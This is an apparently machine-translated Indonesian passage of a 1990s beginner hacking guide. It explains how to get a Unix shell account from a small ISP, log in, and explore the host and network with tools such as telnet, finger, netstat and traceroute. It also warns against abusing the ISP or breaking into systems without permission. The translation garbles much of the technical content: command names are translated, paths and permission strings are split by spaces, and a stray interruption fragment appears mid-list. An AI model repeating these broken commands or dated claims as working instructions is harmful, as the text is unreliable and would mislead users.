---- [Mesg: Y] ------------ [Tombol TAB mengaktifkan menu] ------- [Terhubung: 0:00] ---
CMD>
Dalam hal ini Anda belum di shell, tetapi Anda dapat melihat opsi pada menu untuk sampai ke shell. Jadi, hore, kamu
beruntung, Anda memiliki akun shell. Cukup masukkan "S" dan Anda masuk.
Sekarang tergantung pada ISP yang Anda coba, mungkin ada berbagai macam menu, semuanya dirancang untuk
mempertahankannya
pengguna karena harus tersandung di shell itu sendiri. Tetapi jika Anda memiliki akun shell, Anda mungkin akan melakukannya
temukan kata "shell" di suatu tempat di menu.
Jika Anda tidak mendapatkan sesuatu yang jelas seperti ini, Anda mungkin harus melakukan satu hal yang paling memalukan a
wannabe hacker akan pernah melakukannya. Hubungi dukungan teknis dan tanyakan apakah Anda memiliki akun shell dan, jika
demikian, bagaimana caranya
masuk. Mungkin mereka hanya ingin membuatnya sangat, sangat sulit bagi Anda untuk menemukan akun shell Anda.
Sekarang secara pribadi saya tidak peduli dengan program Telnet Win 95. Untungnya ada banyak cara lain untuk memeriksanya
apakah Anda memiliki akun shell. Inilah cara menggunakan program Hyperterminal, yang, seperti Telnet, datang
gratis dengan sistem operasi Windows 95. Ini membutuhkan jenis koneksi yang berbeda. Alih-alih PPP
koneksi kita akan melakukan dialup telepon sederhana, jenis koneksi yang sama yang Anda gunakan untuk mendapatkan di
sebagian besar komputer
sistem papan buletin (BBS).
1) Pertama, temukan program Hyperteminal dan buat pintasan ke desktop Anda. Yang ini mudah ditemukan. Hanya
klik Mulai, lalu Program, lalu Aksesori. Anda akan menemukan HyperTerminal pada menu aksesoris. Mengklik
itu akan memunculkan jendela dengan banyak ikon. Klik pada yang berlabel "hyperterminal.exe."
2) Ini memunculkan kotak dialog yang disebut "Koneksi Baru." Masukkan nama dialup lokal Anda, lalu di berikutnya
kotak dialog masukkan nomor dialup telepon ISP Anda.
3) Buat pintasan ke desktop Anda.
4) Gunakan Hyperterminal untuk memanggil ISP Anda. Perhatikan bahwa dalam hal ini Anda membuat panggilan telepon
langsung ke shell Anda
akun daripada mencoba menjangkau melalui koneksi PPP.
Sekarang ketika Anda memanggil ISP Anda dari HyperTerminal Anda mungkin mendapatkan banyak pengguliran sampah yang
sangat aneh
di layar Anda. Tapi jangan menyerah. Apa yang terjadi adalah ISP Anda mencoba mengatur koneksi PPP
dengan HyperTerminal. Itulah jenis koneksi yang Anda butuhkan untuk mendapatkan gambar-gambar cantik di Web. Tapi
Hyperterminal tidak mengerti PPP. Sayangnya saya belum bisa mencari tahu mengapa ini
kadang-kadang terjadi atau bagaimana cara menghentikannya. Tetapi sisi baik dari gambar ini adalah bahwa masalahnya
mungkin hilang
lain kali Anda menggunakan HyperTerminal untuk terhubung ke ISP Anda. Jadi, jika Anda menekan lagi, Anda bisa
mendapatkan urutan login.
Saya menemukan sering membantu menunggu beberapa hari dan mencoba lagi. Tentu saja Anda dapat mengadu ke dukungan
teknis di
ISP Anda. Tetapi ada kemungkinan bahwa mereka tidak akan memiliki petunjuk tentang apa yang menyebabkan tujuan mereka
untuk mencoba mendirikan PPP
sesi dengan koneksi Hyperterminal Anda. Mendesah.
Tetapi jika semuanya berjalan dengan baik, Anda akan dapat login. Bahkan, kecuali untuk masalah upaya PPP, saya suka
Program HyperTerminal jauh lebih baik daripada Win 95 Telnet. Jadi, jika Anda bisa membuatnya bekerja, cobalah
sementara waktu. Lihat apakah Anda menyukainya juga.
Ada sejumlah program terminal lain yang sangat bagus untuk menghubungkan ke akun shell Anda.
Mereka termasuk Qmodem, Quarterdeck Internet Suite, dan Bitcom. Jericho merekomendasikan Ewan, program telnet
yang juga berjalan pada Windows 95. Ewan gratis, dan memiliki lebih banyak fitur daripada HyperTerminal atau Win
95 Telnet. Anda dapat mengunduhnya dari situs ftp jericho di sekurity.org di direktori / utils.
OK, katakanlah Anda telah masuk ke ISP Anda dengan program favorit Anda. Tapi mungkin masih belum jelas
apakah Anda memiliki akun shell. Inilah tes Anda selanjutnya. Apa yang Anda harapkan adalah shell prompt Anda, berikan

Halaman 31
perintah "ls -alF." Jika Anda memiliki akun shell nyata, jujur-untuk-kebaikan, Anda harus mendapatkan sesuatu seperti
ini:
> ls -alF
total 87
drwx - x - x 5 pengguna galfina 1024 22 Apr 21:45 ./
drwxr-xr-x 380 root wheel 6656 22 Apr 18:15 ../
-rw-r - r-- 1 pengguna galfina 2793 22 Apr 17:36 .README
-rw-r - r-- 1 pengguna galfina 635 22 Apr 17:36 .Xmodmap
-rw-r - r-- 1 pengguna galfina 624 22 Apr 17:36 .Xmodmap.USKBD
-rw-r - r-- 1 pengguna galfina 808 22 Apr 17:36. Sumber daya
drwx - x - x 2 pengguna galfina 512 Apr 22 17:36 www /
dll.
Ini adalah daftar file dan direktori direktori home Anda. Akun shell Anda dapat memberi Anda a
sekumpulan direktori dan file berbeda dari ini (yang hanya sebagian daftar). Bagaimanapun, jika Anda melihat
apapun yang terlihat sedikit seperti ini, selamat, Anda sudah memiliki akun shell!
************************************************ *****
Catatan newbie: Item pertama dalam sekelompok tanda hubung dan huruf di depan nama file memberitahu Anda seperti apa
file itu. "d" berarti itu adalah direktori, dan "-" berarti itu adalah file. Sisanya adalah izin file Anda.
"r" = izin baca, "w" = izin tulis, dan "x" = eksekusi izin (tidak, "eksekusi" tidak ada hubungannya dengan
lakukan dengan membunuh file, itu berarti Anda memiliki izin untuk menjalankan program yang ada di file ini). Jika t di sini
adalah a
tanda hubung, itu berarti tidak ada izin di sana.
Simbol di tempat kedua, ketiga dan keempat dari kiri adalah izin yang Anda miliki sebagai pengguna,
tiga berikut adalah izin yang dimiliki setiap orang dalam grup yang Anda tuju, dan tiga terakhir adalah
izin siapa pun dan semua orang mungkin miliki. Misalnya, dalam direktori galfina subdirektori "www /" adalah
sesuatu yang dapat Anda baca, tulis, dan eksekusi, sementara yang lain hanya dapat mengeksekusi. Ini adalah direktori
di mana Anda dapat meletakkan halaman Web Anda. Seluruh dunia dapat menelusuri ("mengeksekusi") halaman Web Anda.
Tapi hanya kamu
dapat membaca dan menulis untuk itu.
Jika suatu hari Anda menemukan izin Anda seperti:
drwx - pengguna pemula xrwx 512 Apr 22 17:36 www /
Wah, bahwa "w" di tempat ketiga dari terakhir akan berarti siapa pun dengan akun dari luar ISP Anda dapat
retas halaman Web Anda!
************************************************ ****
Perintah lain yang akan memberi tahu Anda apakah Anda memiliki akun shell adalah "man." Ini memberi Anda online
Manual Unix. Biasanya Anda harus memberikan perintah man dalam bentuk "man <command>" di mana
<command> adalah nama perintah Unix yang ingin Anda pelajari. Misalnya, jika Anda ingin tahu semua
berbagai cara untuk menggunakan perintah "ls", ketikkan "man ls" di prompt.
Di sisi lain, berikut adalah contoh dari sesuatu yang, meskipun ada pada sistem Unix, bukan shell
rekening:
BSDI BSD / 386 1.1 (dub-gw-2.compuserve.com) (ttyp7)
Terhubung ke CompuServe
Nama Host: cis

Halaman 32
Masukkan pilihan (LOGON, BANTUAN, MATI):
Kiat langsung bahwa ini bukan akun shell adalah ia meminta Anda untuk "masuk" alih-alih "masuk:"
Cara Mendapatkan Akun Shell
Bagaimana jika Anda yakin belum memiliki akun shell? Bagaimana Anda menemukan ISP yang akan memberi
kamu satu?
Tempat yang jelas untuk memulai adalah buku telepon Anda. Kecuali jika Anda tinggal di daerah pedesaan atau di negara di
mana
ada beberapa ISP, harus ada sejumlah perusahaan untuk dipilih.
Jadi, inilah masalah Anda. Anda menelepon Boring ISP, Inc. dan berkata, "Saya ingin akun shell." Tapi Joe Dummy aktif
ujung telepon yang lain berkata, "Shell? Apa itu akun shell?" Anda mengatakan "Saya ingin akun shell. SHELL
ACCOUNT !!! "Dia berkata," Duh? "Anda mengatakan" akun Shell. SHELL ACCOUNT !!! "Dia berkata," Um, er, biarkan aku
bicara
kepada penyelia saya. "Mr. Uptight Supervisor mengangkat telepon." Kami tidak memberikan akun shell, Anda kotor
&% $ * # hacker. "
Atau, lebih buruk lagi, mereka mengklaim akun akses Internet yang mereka berikan kepada Anda akun shell tetapi Anda
menemukannya
bukan satu.
Untuk menghindari adegan memalukan ini, hindari menelepon ISP nama besar. Saya dapat menjamin Anda, America Online,
Compuserve dan Microsoft Network tidak memberikan akun shell.
Apa yang ingin Anda temukan adalah ISP paling kecil dan paling kecil di kota. Yang mengkhususkan diri pada pelanggan
berwajah pucat
yang begadang sepanjang malam bermain MOO dan MUD. Orang-orang yang meniru grrrls di IRC. Sekarang bukan untuk
mengatakan bahwa orang-orang MUD dan IRC biasanya adalah peretas. Tapi ini pasti pecandu internet serius Anda.
ISP yang melayani orang-orang seperti itu mungkin juga memahami tipe orang yang ingin belajar Unix
luar dan dalam.
Jadi, Anda menelepon atau mengirim email ke salah satu ISP ini di jalan belakang Internet dan berkata, "Salam, d00d! Saya jahat
haxor dan minta akun shell pronto! "
Tidak tidak Tidak! Kemungkinannya adalah Anda mendapatkan pemilik ISP kecil ini di ujung lain telepon. Dia mungkin seorang
hacker sendiri. Tebak apa? Dia suka meretas tetapi dia tidak menginginkan peretas (atau peretas wannabe)
pelanggan. Dia tidak menginginkan seorang pelanggan yang akan menarik para pembom email dan melakukan perang hacker
dan menarik keluhan dari sysadmin yang kepadanya dude mematikan ini telah menguji kode exploit.
Jadi apa yang Anda lakukan adalah mengatakan sesuatu seperti "Katakan, apakah Anda menawarkan akun shell? Saya benar-
benar suka menelusuri
Web dengan lynx. Aku benci menunggu lima jam untuk memuat semua gambar cantik dan applet Java. Dan saya suka
lakukan email dengan Pine. Untuk newsgroup, saya harap! "
Mulailah seperti ini dan pemilik ISP kecil ini mungkin mengatakan sesuatu seperti, "Wow, bung, saya tahu apa yang Anda
berarti. IE dan Netscape benar-benar sial! Lynx uber alles! Nama pengguna apa yang Anda inginkan? "
Pada titik ini, minta pemilik akun tamu. Seperti yang akan Anda pelajari di bawah, beberapa akun shell juga demikian
dibatasi bahwa mereka hampir tidak berharga.
Tetapi katakanlah Anda tidak dapat menemukan ISP apa pun dalam jangkauan panggilan telepon lokal yang akan memberi Anda
akun shell. Atau
satu-satunya akun shell yang bisa Anda dapatkan tidak berharga. Atau Anda dikenal sebagai peretas jahat dan Anda pernah
melakukannya
telah menggebrak setiap ISP di kota. Apa yang bisa kau lakukan?
Halaman 33
Pilihan terbaik Anda adalah mendapatkan akun di ISP jauh, bahkan di negara lain. Juga sedikit
ISP ukuran sedang yang menawarkan akun shell (misalnya, Netcom) bahkan mungkin memiliki nomor dialup lokal untuk
kamu. Tetapi jika mereka tidak memiliki dialup lokal, Anda masih dapat mengakses akun shell yang terletak * di mana saja * di
dunia dengan mengatur koneksi PPP dengan ISP dialup lokal Anda, dan kemudian mengakses akun shell Anda
menggunakan program telnet di komputer di rumah Anda.
***********************************************
Jahat Genius Tip: Tentu, Anda dapat telnet ke akun shell Anda dari akun ISP lain. Tapi kecuali kamu punya
perangkat lunak yang memungkinkan Anda mengirim kata sandi dalam bentuk terenkripsi, seseorang mungkin mengendus kata
sandi Anda
dan masuk ke akun Anda. Jika Anda menjadi terkenal di dunia peretas, banyak peretas lain yang akan melakukannya
terus-menerus mengolok-olok Anda dengan mengendus kata sandi Anda. Sayangnya, hampir semua akun shell disetel
jadi Anda harus memaparkan kata sandi Anda kepada siapa saja yang telah menyembunyikan sniffer di mana saja di antara ISP
itu
menyediakan koneksi PPP Anda dan ISP akun shell Anda.
Salah satu solusinya adalah mendesak penyedia akun shell yang menjalankan ssh (secure shell).
************************************************
Jadi di mana Anda dapat menemukan ISP ini yang akan memberi Anda akun shell? Salah satu sumber yang bagus adalah
http://www.celestin.com/pocia/. Ini menyediakan tautan ke Penyedia Layanan Internet yang dikategorikan berdasarkan geografis
wilayah. Mereka bahkan memiliki tautan untuk memungkinkan Anda mendaftar dengan ISP yang melayani Lesser Antilles!
*********************************************
Kiat Genius Jahat: Penjahat komputer dan peretas jahat akan sering mendapatkan akun tamu di ISP dan
lakukan pekerjaan kotor mereka selama beberapa jam akun tamu ini tersedia untuk mereka. Karena praktik ini memberikan
Kesempatan untuk menyebabkan begitu banyak kerusakan, pada akhirnya mungkin menjadi sangat sulit untuk menjalankan tes
pada tamu
rekening.
*********************************************
Tetapi jika Anda ingin menemukan akun shell yang baik dengan cara hacker, inilah yang Anda lakukan. Mulailah dengan daftar
situs web peretas favorit. Sebagai contoh, mari kita coba http://ra.nilenet.com/~mjl/hacks/codez.htm.
Anda mengambil bagian awal dari URL (Uniform Resource Locator) sebagai titik awal Anda. Dalam hal ini
"http://ra.nilenet.com." Coba berselancar ke URL itu. Dalam banyak kasus, ini akan menjadi laman beranda ISP tersebut. Saya t
harus memiliki petunjuk cara mendaftar akun shell. Dalam kasus Nile Net kami menyerang peretas
emas:
Akun dan Harga Dial-up
Akun NEXUS
Akun NEXUS meliputi: Akses ke UNIX Shell, lengkap
Akses internet, newsgroup Usenet, 5mb FTP dan / atau
Ruang penyimpanan WWW, dan waktu tanpa batas.
Biaya Aktivasi Satu Kali: $ 20,00
Biaya Layanan Bulanan: $ 19,95 atau
Biaya Layanan Tahunan: $ 199,95
Selain itu mereka membuat masalah besar tentang kebebasan berbicara online. Dan mereka meng-host halaman peretas hebat
penuh
Panduan ini untuk (kebanyakan) Hacking Tidak Berbahaya!
Cara Masuk ke Akun Shell Anda
Sekarang kami menganggap Anda akhirnya memiliki akun shell tamu dan siap untuk mengujinya. Jadi sekarang kita perlu
mencari cara untuk masuk. Sekarang semua Anda jenius hacker membaca ini, mengapa Anda tidak lupa memecat saya saja

Halaman 34
memberi tahu orang-orang bagaimana melakukan sesuatu yang sederhana seperti cara masuk. Harap diingat bahwa setiap orang
memiliki yang pertama
masuk. Jika Anda belum pernah menggunakan Unix, ini pertama kali bisa mengintimidasi. Bagaimanapun, jika Anda seorang
jenius Unix
Anda tidak perlu membaca Panduan Pemula ini. Jadi jika Anda mengintai di sini mencari
flamebait, kirim apimu ke / dev / null.
************************************************ *********
Catatan newbie: "Api" adalah penghinaan, ocehan menjengkelkan dan ocehan yang dilakukan oleh orang-orang yang sangat
kurang dalam keterampilan sosial dan banyak & $% @ # !! tetapi siapa yang mengira mereka adalah ahli komputer yang brilian.
Untuk
contoh, catatan pemula ini adalah api saya terhadap & $% @ # !! flamers.
"/ dev / null" adalah singkatan dari "device null." Ini adalah nama file dalam sistem operasi Unix. Data apa pun yang dikirim ke
/ dev / null dibuang. Jadi ketika seseorang mengatakan mereka akan memasukkan sesuatu ke "/ dev / null" itu artinya mereka
mengirimkannya ke pengabaian permanen.
************************************************ *********
Hal pertama yang perlu Anda ketahui untuk bisa masuk ke akun shell Anda adalah nama pengguna dan kata sandi Anda.
Anda perlu mendapatkan informasi itu dari ISP yang baru saja mendaftarkan Anda. Hal kedua yang perlu Anda lakukan
Yang perlu diingat adalah bahwa Unix adalah "case sensitive." Itu berarti jika nama login Anda adalah "JoeSchmoe" shell akan
berpikir
"joeschmoe" adalah orang yang berbeda dari "JoeSchmoe" atau "JOESCHMOE."
OK, jadi Anda baru saja terhubung ke akun shell Anda untuk pertama kalinya. Anda mungkin melihat segala macam berbeda
hal-hal di layar pertama itu. Tapi satu hal yang akan selalu Anda lihat adalah prompt:
masuk:
Di sini Anda akan mengetikkan nama pengguna Anda.
Sebagai tanggapan Anda akan selalu ditanya:
Kata sandi:
Di sini Anda mengetikkan kata sandi Anda.
Setelah ini, Anda akan mendapatkan semacam prompt. Mungkin sederhana seperti:
%
atau
$
atau
>
Atau serumit:
mengantuk: ~ $
Atau bahkan mungkin semacam menu rumit di mana Anda harus memilih opsi "shell" sebelum mendapatkannya
ke prompt shell.
Atau mungkin sederhana seperti:
#

Halaman 35
************************************************ ********
Catatan pemula: Tanda "#" biasanya berarti Anda memiliki kekuatan pengguna super dari akun "root". The Unix
superuser memiliki kekuatan untuk melakukan * apa saja * ke komputer. Tetapi Anda tidak akan melihat prompt ini kecuali
administrator sistem telah benar-benar ceroboh - atau seseorang sedang bercanda dengan Anda. Terkadang seorang hacker
berpikir dia telah masuk ke akun pengguna super karena melihat prompt "#". Tapi terkadang
ini hanya tipuan yang dimainkan sysadmin. Jadi si hacker bermain-main dalam apa yang dia pikir adalah
root akun sementara sysadmin dan teman-temannya dan polisi semua menertawakan si peretas.
************************************************ ********
Sudah siap untuk mulai meretas dari akun shell Anda? Hati-hati, itu mungkin sangat melumpuhkan sehingga tidak berharga
peretasan. Atau, itu mungkin cukup bagus, tetapi Anda mungkin secara tidak sengaja melakukan sesuatu untuk membuat Anda
dikeluarkan. Untuk
hindari nasib ini, pastikan untuk membaca Beginners 'Series # 3 Bagian 2 dari Cara Mendapatkan * Akun Shell * Bagus *,
datang
keluar besok.
Di bagian GTMHH Anda akan belajar cara:
· Jelajahi akun shell Anda
· Putuskan apakah akun shell Anda ada gunanya untuk meretas
· Jaga agar akun shell Anda tidak hilang
Jika Anda bertanya-tanya tentang semua input dari jericho dalam Panduan ini, ya, dia cukup membantu
memeriksanya dan membuat saran. Jericho adalah konsultan keamanan yang menjalankan host Internet sendiri,
obscure.sekurity.org. Terima kasih, jericho@dimensional.com, dan selamat melakukan peretasan!
PANDUAN UNTUK (kebanyakan) HACKING HARMLESS
Seri Pemula # 3 Bagian 2
Cara Mendapatkan Akun Shell * Bagus *
____________________________________________________________
____________________________________________________________
Di bagian ini Anda akan belajar:
· Cara menjelajahi akun shell Anda
· Sepuluh Meinel Hall of Fame Shell Alat Eksplorasi Akun
· Cara memutuskan apakah akun shell Anda ada gunanya untuk diretas
· Sepuluh Meinel Hall of Fame LAN dan Alat Eksplorasi Internet
· Meinel Hall of Infamy Lima Cara Utama untuk Menghindar dari Akun Shell Anda
____________________________________________________________
Cara Menjelajahi Akun Shell Anda
Jadi Anda berada di akun shell Anda. Anda telah mencoba perintah "ls -alF" dan cukup yakin ini benar-benar adalah
akun shell. Apa yang kamu lakukan selanjutnya
Tempat yang baik untuk memulai adalah mencari tahu jenis kerang yang Anda miliki. Ada banyak kerang, masing-masing
memiliki
cara kerja yang sedikit berbeda. Untuk melakukan ini, atas permintaan Anda, berikan perintah "echo $ SHELL." Pastikan untuk

Halaman 36
ketik huruf kecil dan huruf besar yang sama. Jika Anda memberi perintah "ECHO $ shell," untuk
Misalnya, perintah ini tidak akan berfungsi.
Jika Anda mendapat respons:
/ bin / sh
Itu berarti Anda memiliki kulit Bourne.
Jika Anda mendapatkan:
/ bin / bash
Maka Anda berada di shell Bourne Again (bash).
Jika Anda mendapatkan:
/ bin / ksh
Anda memiliki kulit Korn.
Jika perintah "echo $ SHELL" tidak berfungsi, coba perintah "echo $ shell," ingat untuk menggunakan yang lebih rendah
kasus untuk "shell." Ini kemungkinan akan memberi Anda jawabannya:
/ bin / csh
Ini berarti Anda memiliki shell C.
Mengapa penting untuk mengetahui cangkang mana yang Anda miliki? Untuk saat ini, Anda akan menginginkan sebuah shell
yang mudah digunakan. Untuk
Misalnya, ketika Anda melakukan kesalahan dalam mengetik, itu bagus untuk menekan tombol backspace dan tidak melihat ^ H
^ H ^ H pada Anda
layar. Namun kemudian, untuk menjalankan eksploitasi super hacker tersebut, shell C mungkin lebih baik untuk Anda.
Untungnya, Anda mungkin tidak terjebak dengan shell apa pun yang Anda miliki saat login. Jika akun shell Anda
ada gunanya, Anda akan memiliki pilihan kerang.
Percayalah, jika Anda seorang pemula, Anda akan menemukan bash menjadi shell yang paling mudah digunakan. Anda mungkin
bisa mendapatkan
bash shell hanya dengan mengetik kata "bash" di prompt. Jika ini tidak berhasil, tanyakan dukungan teknis pada Anda
ISP untuk akun shell yang diatur untuk menggunakan bash. Buku bagus tentang penggunaan bash shell adalah _Learning the
Bash
Shell_, oleh Cameron Newham dan Bill Rosenblatt, diterbitkan oleh O'Reilly.
Jika Anda ingin mencari tahu cangkang lain yang berhak Anda gunakan, coba "csh" untuk mendapatkan cangkang; "ksh" untuk
mendapatkannya
shell Korn, "sh" untuk shell Bourne, "tcsh" untuk shell Tcsh, dan "zsh" untuk shell Zsh. Jika tidak
miliki salah satunya, ketika Anda memberikan perintah untuk masuk ke shell itu Anda akan mendapatkan kembali jawaban
"perintah
tidak ditemukan."
Sekarang Anda telah memilih cangkang Anda, hal berikutnya adalah menjelajah. Lihat kekayaan apa yang diizinkan ISP Anda
menggunakan. Untuk itu Anda akan ingin belajar, dan maksud saya * benar-benar belajar * perintah Unix Anda yang paling
penting dan
program bantu. Karena saya wasit tertinggi dari apa yang masuk ke dalam Panduan ini, saya harus memutuskan apa
perintah yang paling penting adalah. Hmm, "sepuluh" terdengar seperti angka yang terkenal. Jadi, Anda akan mendapatkan:
Alat Eksplorasi Akun Sepuluh Meinel Hall of Fame Shell
1) man <nama perintah>

Halaman 37
Perintah ajaib ini memunculkan manual Unix online. Gunakan pada setiap perintah di bawah ini, hari ini!
Bertanya-tanya apa semua opsi perintah pria itu? Coba opsi "man -k".
2) ls
Daftar file. Jericho menyarankan "Biasakan orang menggunakan" ls -alF ". Ini akan ikut mengecilkan
jalan bagi pengguna yang sadar akan keamanan. "Anda akan melihat daftar besar file yang tidak dapat Anda lihat dengan" ls "
perintah sendiri, dan banyak detail. Jika Anda melihat daftar file yang begitu panjang sehingga mereka gulir dari layar terminal,
salah satu cara untuk memecahkan masalah adalah dengan menggunakan "ls -alF | lebih."
3) pwd
Menampilkan direktori tempat Anda berada.
4) cd <direktori>
Mengubah direktori. Direktori kewajiban untuk memeriksa meliputi / usr, / bin dan / dll. Untuk tertawa, saran Jericho
menjelajahi dalam / tmp.
5) lebih banyak <filename>
Ini menunjukkan isi file teks. Anda juga mungkin dapat menemukan "kurang" dan "kucing" yang serupa
perintah.
6) dimana <nama program>
Pikirkan mungkin ada program bagus tersembunyi di suatu tempat? Mungkin game yang Anda sukai? Ini akan menemukannya
untuk Anda.
Perintah serupa adalah "temukan" dan "temukan." Cobalah semuanya untuk kesenangan ekstra.
7) vi
Program pengeditan. Anda akan membutuhkannya untuk membuat file Anda sendiri dan ketika Anda memulai pemrograman saat
di file Anda
akun shell. Anda dapat menggunakannya untuk menulis file yang sangat menyeramkan agar orang membaca ketika mereka
menyentuh Anda. Atau coba
"emacs." Ini adalah program pengeditan lain dan IMHO lebih menyenangkan daripada vi. Program pengeditan lain yang
mungkin Anda temukan
termasuk "ed" (program pengeditan kuno yang saya gunakan untuk menulis ribuan baris kode Fortran 77),
"ex," "fmt," "gmacs," "gnuemacs," dan "pico."
8) grep
Ekstrak informasi dari file, terutama berguna untuk melihat apa yang ada di file syslog dan shell log. Serupa
perintahnya adalah "egrep," "fgrep," dan "look."
9) chmod <filename>
Ubah izin file.
10) rm <nama file>
Menghapus berkas. Jika Anda memiliki perintah ini, Anda juga harus menemukan "cp" untuk menyalin file, dan "mv" untuk
memindahkan file.
Bagaimana Mengenalinya Apakah Akun Shell Anda Ada gunanya untuk Peretasan
Sayangnya, tidak semua akun shell dibuat sama. ISP Anda mungkin telah memutuskan untuk melumpuhkan peretas pemula Anda
berkarir dengan melarang akses Anda ke alat penting. Tetapi Anda benar-benar harus memiliki akses ke sepuluh besar
alat yang tercantum di atas. Selain itu, Anda akan memerlukan alat untuk menjelajahi jaringan area lokal (LAN) ISP dan
Internet. Jadi dalam semangat menjadi Penengah Tertinggi Haxor Kewl, berikut adalah saya:
Sepuluh Meinel Hall of Fame LAN dan Alat Eksplorasi Internet
1) telnet <hostname> <nomor port atau nama>

Halaman 38
Jika akun shell Anda tidak akan membiarkan Anda melakukan telnet ke port apa pun yang Anda inginkan baik pada LAN-nya
atau Internet, ya
benar-benar lumpuh sebagai peretas. Buang ISP Anda sekarang!
2) siapa
Menunjukkan Anda siapa lagi yang saat ini masuk di LAN ISP Anda. Perintah bagus lainnya untuk mengeksplorasi yang lain
pengguna di LAN Anda adalah "w," "rwho," "pengguna."
3) netstat
Semua jenis statistik di LAN Anda, termasuk semua koneksi Internet. Untuk kesenangan nyata, coba "netstat -r" untuk
melihatnya
tabel routing kernel. Namun, jericho memperingatkan "Hati-hati. Aku sedang mengajar seorang teman dasar-dasar summin g a
Sistem Unix dan saya menyuruhnya melakukan itu dan 'ifconfig'. Dia di-boot dari sistem
hari berikutnya untuk 'kecurigaan hacker' meskipun keduanya adalah perintah yang sah untuk pengguna. "
4) whois <hostname>
Dapatkan banyak informasi tentang host Internet di luar LAN Anda.
5) nslookup
Dapatkan lebih banyak informasi tentang host Internet lainnya.
6) menggali
Bahkan lebih banyak info tentang host Internet lainnya. Nslookup dan menggali tidak mubazir. Coba dapatkan akun shell itu
memungkinkan Anda menggunakan keduanya.
7) jari
Anda tidak hanya dapat menggunakan jari di dalam LAN Anda. Terkadang ini akan memberi Anda informasi yang berharga
-------------------------------------------------- ----------------------
Transfer terputus!
sts.
8) ping
Cari tahu apakah komputer yang jauh masih hidup dan menjalankan tes diagnostik - atau sekadar menjadi orang yang pelit dan
pemalu
dengan ping. (Saya sangat menyarankan * terhadap * menggunakan ping untuk mengganggu atau membahayakan orang lain.)
9) traceroute
Jenis suka ping dengan sikap. Memetakan koneksi Internet, mengungkapkan router dan kotak yang menjalankan firewall.
10) ftp
Gunakan untuk mengunggah dan mengunduh file ke dan dari komputer lain.
Jika Anda memiliki semua alat ini, Anda dalam kondisi yang baik untuk memulai karir peretasan Anda. Tetap bersama ISP Anda.
Obati itu
baik.
Setelah Anda mendapatkan akun shell Anda, Anda mungkin ingin menambah perintah "man" dengan yang baik
Buku Unix. Jericho merekomendasikan _Unix dalam Nutshell_ yang diterbitkan oleh O'Reilly. "Ini adalah Unix utama
referensi perintah, dan hanya biaya 10 dolar. O'Reilly r00lz. "
Cara Menghindari Kehilangan Akun Shell Anda

Halaman 39
Jadi sekarang Anda memiliki impian peretas, akun di komputer yang kuat yang menjalankan Unix. Bagaimana Anda menyimpan
ini?
akun impian? Jika Anda seorang peretas, itu tidak mudah. Masalahnya adalah Anda tidak berhak menyimpannya
rekening. Anda dapat ditendang karena dicurigai sebagai orang jahat, atau bahkan jika Anda merasa tidak nyaman, di
kemauan pemilik.
Meinel Hall 'O Infamy
Lima Cara Teratas untuk Menghilangkan Akun Shell Anda
1) Menyalahgunakan ISP Anda
Katakanlah Anda membaca Bugtraq dan Anda melihat beberapa kode untuk cara baru membobol komputer. Terengah-engah
dengan kegembiraan, Anda menjalankan emacs dan menempelkan kode. Anda memperbaiki barang-barang yang sengaja
dilumpuhkan seseorang
untuk menjaga agar total idiot tidak menjalankannya. Anda men-tweak sampai berjalan di bawah citarasa Unix Anda. Anda
mengkompilasi dan
jalankan program melawan ISP Anda sendiri. Berhasil! Anda melihat prompt "#" itu dan melompat ke atas dan
berteriak, "Aku punya root! Aku punya root!" Anda telah kehilangan keperawanan hacker Anda, Anda Bung brilian, Anda!
Hanya,
lain kali Anda masuk, kata sandi Anda tidak berfungsi. Anda telah mem-boot ISP Anda. TIDAK PERNAH, PERNAH
ABUSE ISP ANDA!
************************************************ *******
Anda dapat masuk ke penjara peringatan: Tentu saja, jika Anda ingin masuk ke komputer lain, Anda harus memiliki
izin pemilik. Kalau tidak, Anda melanggar hukum.
************************************************ *******
2) Penyalahgunaan Ping.
Godaan lain adalah menggunakan koneksi Internet yang kuat dari akun shell Anda (biasanya T1 atau T3)
ping omong kosong dari orang-orang yang tidak Anda sukai. Ini khususnya umum pada Obrolan Internet Relay. Berfikir tentang
ICBMing atau nuking dork itu? Tahan godaan untuk menyalahgunakan ping atau Pesan Kontrol Internet lainnya
Serangan protokol. Gunakan ping saja sebagai alat diagnostik, oke? Silahkan? Atau!
3) Berselancar Port Berlebihan
Port surfing adalah telnetting ke port tertentu di komputer lain. Biasanya Anda baik-baik saja jika hanya berkunjung sebentar
komputer lain melalui telnet, dan jangan melangkah lebih jauh dari apa yang ditawarkan port kepada pengunjung biasa. Tapi jika
Anda terus mencari dan bermain dengan komputer lain, sysadmin di komputer target mungkin akan
email catatan sysadmin Anda tentang kunjungan kecil Anda. (Catatan kunjungan pelabuhan ini disimpan dalam "pesan," dan
kadang-kadang dalam "syslog" tergantung pada konfigurasi komputer target Anda - dan dengan asumsi itu adalah Unix
sistem.)
Bahkan jika tidak ada yang mengeluh tentang Anda, beberapa sysadmin biasanya memeriksa file log shell yang menyimpan
catatan
semua yang Anda atau pengguna lain pada sistem telah lakukan di kulit mereka. Jika sysadmin Anda melihat a
Pola perhatian berlebihan pada satu atau beberapa komputer, ia mungkin menganggap Anda merencanakan pembobolan.
Boom, kata sandi Anda sudah mati.
4) Menjalankan Program Mencurigakan
Jika Anda menjalankan program yang penggunaan utamanya adalah sebagai alat untuk melakukan kejahatan komputer, Anda
cenderung ditendang
dari ISP Anda. Misalnya, banyak ISP memiliki sistem pemantauan yang mendeteksi penggunaan program
SETAN. Jalankan SATAN dari akun shell Anda dan Anda adalah sejarah.
************************************************ ********
Catatan pemula: SATAN singkatan dari Alat Administrasi Keamanan untuk Menganalisis Jaringan. Itu pada dasarnya bekerja
dengan telnetting ke port satu demi satu dari komputer korban. Ini menentukan program apa (daemon)
berjalan di setiap port, dan mencari tahu apakah daemon itu memiliki kerentanan yang dapat digunakan untuk menerobos
komputer itu. SATAN dapat digunakan oleh sysadmin untuk mengetahui cara membuat komputernya aman. Atau itu
mungkin sama mudahnya digunakan oleh penjahat komputer untuk membobol komputer orang lain.
************************************************ *********

Halaman 40
5) Menyimpan Program Mencurigakan
Sangat menyenangkan untuk berpikir bahwa pemilik ISP Anda memikirkan bisnis mereka sendiri. Tetapi mereka tidak
melakukannya. Mereka mengintip di
direktori pengguna mereka. Mereka menertawakan email Anda. OK, mungkin mereka sangat berpikiran tinggi dan menolak
godaan untuk mengintip email Anda. Tetapi kemungkinan besar bahwa mereka akan mengintip file-file log shell Anda itu
catat setiap penekanan tombol yang Anda lakukan saat berada di akun shell Anda. Jika mereka tidak menyukai apa yang mereka
